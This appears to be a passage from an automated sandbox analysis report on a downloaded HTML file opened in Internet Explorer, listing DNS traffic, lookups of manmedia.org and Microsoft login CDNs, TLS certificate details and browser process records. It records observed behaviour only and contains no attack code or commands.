                                                  Feb 23, 2021 16:02:10.739449978 CET  50055        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:10.799523115 CET  53           50055      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:11.770328999 CET  61374        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:11.821803093 CET  53           61374      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:12.734819889 CET  50339        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:12.786484957 CET  53           50339      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:13.951509953 CET  63307        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:14.001426935 CET  53           63307      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:18.245417118 CET  49694        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:18.305520058 CET  53           49694      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:19.623764992 CET  54982        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:19.625435114 CET  50010        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:19.672889948 CET  63718        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:19.675731897 CET  53           50010      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:19.722986937 CET  53           63718      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:19.724246979 CET  62116        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:19.772965908 CET  53           62116      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:19.799175978 CET  63816        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:19.811990023 CET  53           54982      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:19.847739935 CET  53           63816      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:19.952163935 CET  55014        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:20.011754036 CET  53           55014      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:21.058018923 CET  62208        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:21.109530926 CET  53           62208      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:21.492175102 CET  57574        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:21.545072079 CET  53           57574      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:27.144164085 CET  51818        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:27.192840099 CET  53           51818      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:30.564531088 CET  56628        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:30.624289036 CET  53           56628      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:31.570382118 CET  56628        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:31.630390882 CET  53           56628      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:32.588417053 CET  56628        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:32.644265890 CET  53           56628      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:34.603355885 CET  56628        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:34.665745974 CET  53           56628      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:38.618885994 CET  56628        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:38.672883034 CET  53           56628      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:39.200639009 CET  60778        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:39.257771015 CET  53           60778      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:39.373820066 CET  53799        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:39.422380924 CET  53           53799      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:42.757272959 CET  54683        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:42.786381006 CET  59329        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:42.836890936 CET  53           59329      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:42.947171926 CET  53           54683      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:47.301731110 CET  64021        53         192.168.2.6      8.8.8.8
                                                  Feb 23, 2021 16:02:47.361794949 CET  53           64021      8.8.8.8          192.168.2.6
                                                  Feb 23, 2021 16:02:48.225008011 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:48.273657084 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:48.824106932 CET5817753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:48.875699997 CET53581778.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:49.229999065 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:49.252506971 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:49.278628111 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:49.309638023 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:50.244508982 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:50.261003971 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:50.293301105 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:50.309602976 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:51.260147095 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:51.308711052 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:52.295689106 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:52.344383001 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:53.293883085 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:53.352950096 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:56.307324886 CET5612953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:56.357923985 CET53561298.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:57.308763027 CET5070053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:57.357343912 CET53507008.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:02:58.998047113 CET5406953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:02:59.099615097 CET53540698.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:00.113002062 CET6117853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:00.175487995 CET53611788.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:00.804245949 CET5701753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:00.870345116 CET53570178.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:01.373361111 CET5632753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:01.433697939 CET53563278.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:01.582216024 CET5024353192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:01.646534920 CET53502438.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:02.258481026 CET6205553192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:02.318363905 CET53620558.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:02.893904924 CET6124953192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:02.953095913 CET53612498.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:03.544648886 CET6525253192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:03.593317986 CET53652528.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:04.153687954 CET6436753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:04.225543022 CET53643678.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:04.872262955 CET5506653192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:04.939877987 CET53550668.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:06.080887079 CET6021153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:06.140974045 CET53602118.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:07.098139048 CET5657053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:07.157731056 CET53565708.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:08.872299910 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:08.922627926 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:09.886121988 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:09.946911097 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:10.902343988 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:10.953257084 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:11.764092922 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:11.814476967 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:12.776983023 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:12.827263117 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:12.918086052 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:12.966739893 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:13.876075983 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:13.926209927 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:15.886631966 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:15.935420036 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:16.934031010 CET5845453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:16.985090017 CET53584548.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:19.902928114 CET5518053192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:19.951489925 CET53551808.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:32.384936094 CET5872153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:32.443727970 CET53587218.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:38.973121881 CET5769153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:39.024638891 CET53576918.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:03:44.922283888 CET5294353192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:03:44.987657070 CET53529438.8.8.8192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 23, 2021 16:02:01.976259947 CET | 192.168.2.6 | 8.8.8.8 | 0x4242 | Standard query (0) | bms.kaseya.com | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.623764992 CET | 192.168.2.6 | 8.8.8.8 | 0x80a7 | Standard query (0) | manmedia.org | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.625435114 CET | 192.168.2.6 | 8.8.8.8 | 0x20f | Standard query (0) | code.jquery.com | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.672889948 CET | 192.168.2.6 | 8.8.8.8 | 0xcd77 | Standard query (0) | cdnjs.cloudflare.com | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.724246979 CET | 192.168.2.6 | 8.8.8.8 | 0x30e1 | Standard query (0) | stackpath.bootstrapcdn.com | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.799175978 CET | 192.168.2.6 | 8.8.8.8 | 0x837c | Standard query (0) | ajax.aspnetcdn.com | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:21.058018923 CET | 192.168.2.6 | 8.8.8.8 | 0x478e | Standard query (0) | aadcdn.msftauth.net | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:39.200639009 CET | 192.168.2.6 | 8.8.8.8 | 0xe7c5 | Standard query (0) | manmedia.org | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:42.757272959 CET | 192.168.2.6 | 8.8.8.8 | 0xd1c0 | Standard query (0) | manmedia.org | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 23, 2021 16:02:02.036315918 CET | 8.8.8.8 | 192.168.2.6 | 0x4242 | No error (0) | bms.kaseya.com | origin-bms.kaseya.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 16:02:02.036315918 CET | 8.8.8.8 | 192.168.2.6 | 0x4242 | No error (0) | origin-bms.kaseya.com | - | 52.144.52.222 | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:02.036315918 CET | 8.8.8.8 | 192.168.2.6 | 0x4242 | No error (0) | origin-bms.kaseya.com | - | 52.144.52.223 | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.675731897 CET | 8.8.8.8 | 192.168.2.6 | 0x20f | No error (0) | code.jquery.com | cds.s5x3j6q5.hwcdn.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 16:02:19.722986937 CET | 8.8.8.8 | 192.168.2.6 | 0xcd77 | No error (0) | cdnjs.cloudflare.com | - | 104.16.19.94 | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.722986937 CET | 8.8.8.8 | 192.168.2.6 | 0xcd77 | No error (0) | cdnjs.cloudflare.com | - | 104.16.18.94 | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.772965908 CET | 8.8.8.8 | 192.168.2.6 | 0x30e1 | No error (0) | stackpath.bootstrapcdn.com | cds.j3z9t3p6.hwcdn.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 16:02:19.811990023 CET | 8.8.8.8 | 192.168.2.6 | 0x80a7 | No error (0) | manmedia.org | - | 204.93.216.87 | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:19.847739935 CET | 8.8.8.8 | 192.168.2.6 | 0x837c | No error (0) | ajax.aspnetcdn.com | mscomajax.vo.msecnd.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 16:02:21.109530926 CET | 8.8.8.8 | 192.168.2.6 | 0x478e | No error (0) | aadcdn.msftauth.net | aadcdnoriginneu.azureedge.net | - | CNAME (Canonical name) | IN (0x0001)
Feb 23, 2021 16:02:21.109530926 CET | 8.8.8.8 | 192.168.2.6 | 0x478e | No error (0) | cs1100.wpc.omegacdn.net | - | 152.199.23.37 | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:39.257771015 CET | 8.8.8.8 | 192.168.2.6 | 0xe7c5 | No error (0) | manmedia.org | - | 204.93.216.87 | A (IP address) | IN (0x0001)
Feb 23, 2021 16:02:42.947171926 CET | 8.8.8.8 | 192.168.2.6 | 0xd1c0 | No error (0) | manmedia.org | - | 204.93.216.87 | A (IP address) | IN (0x0001)

HTTPS Packets

Timestamp: Feb 23, 2021 16:02:19.921765089 CET
Source IP / Port: 104.16.19.94 / 443
Dest IP / Port: 192.168.2.6 / 49735
Certificate chain:
  Leaf: Subject CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US; Issuer CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Not Before Wed Oct 21 02:00:00 CEST 2020; Not After Thu Oct 21 01:59:59 CEST 2021
  Intermediate: Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE; Not Before Mon Jan 27 13:48:08 CET 2020; Not After Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 23, 2021 16:02:19.921802998 CET
Source IP / Port: 104.16.19.94 / 443
Dest IP / Port: 192.168.2.6 / 49736
Certificate chain:
  Leaf: Subject CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US; Issuer CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Not Before Wed Oct 21 02:00:00 CEST 2020; Not After Thu Oct 21 01:59:59 CEST 2021
  Intermediate: Subject CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US; Issuer CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE; Not Before Mon Jan 27 13:48:08 CET 2020; Not After Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 23, 2021 16:02:21.315383911 CET
Source IP / Port: 152.199.23.37 / 443
Dest IP / Port: 192.168.2.6 / 49745
Certificate chain:
  Leaf: Subject CN=aadcdn.msftauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US; Issuer CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US; Not Before Thu Jul 09 02:00:00 CEST 2020; Not After Fri Jul 09 14:00:00 CEST 2021
  Intermediate: Subject CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US; Issuer CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US; Not Before Fri Mar 08 13:00:00 CET 2013; Not After Wed Mar 08 13:00:00 CET 2023
  Root: Subject CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US; Issuer CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US; Not Before Fri Nov 10 01:00:00 CET 2006; Not After Mon Nov 10 01:00:00 CET 2031
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 23, 2021 16:02:21.389024019 CET
Source IP / Port: 152.199.23.37 / 443
Dest IP / Port: 192.168.2.6 / 49744
Certificate chain:
  Leaf: Subject CN=aadcdn.msftauth.net, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US; Issuer CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US; Not Before Thu Jul 09 02:00:00 CEST 2020; Not After Fri Jul 09 14:00:00 CEST 2021
  Intermediate: Subject CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US; Issuer CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US; Not Before Fri Mar 08 13:00:00 CET 2013; Not After Wed Mar 08 13:00:00 CET 2023
  Root: Subject CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US; Issuer CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US; Not Before Fri Nov 10 01:00:00 CET 2006; Not After Mon Nov 10 01:00:00 CET 2031
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 16:01:59
Start date: 23/02/2021
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase: 0x7ff721e20000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 16:01:59
Start date: 23/02/2021
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5116 CREDAT:17410 /prefetch:2
Imagebase: 0xfb0000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 16:02:16
Start date: 23/02/2021
Path: C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html
Imagebase: 0x7ff721e20000
File size: 823560 bytes
MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 16:02:17
Start date: 23/02/2021
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17410 /prefetch:2
Imagebase: 0xfb0000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 16:02:36
Start date: 23/02/2021
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17412 /prefetch:2
Imagebase: 0xfb0000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 16:02:40
Start date: 23/02/2021
Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6480 CREDAT:17414 /prefetch:2
Imagebase: 0xfb0000
File size: 822536 bytes
MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Disassembly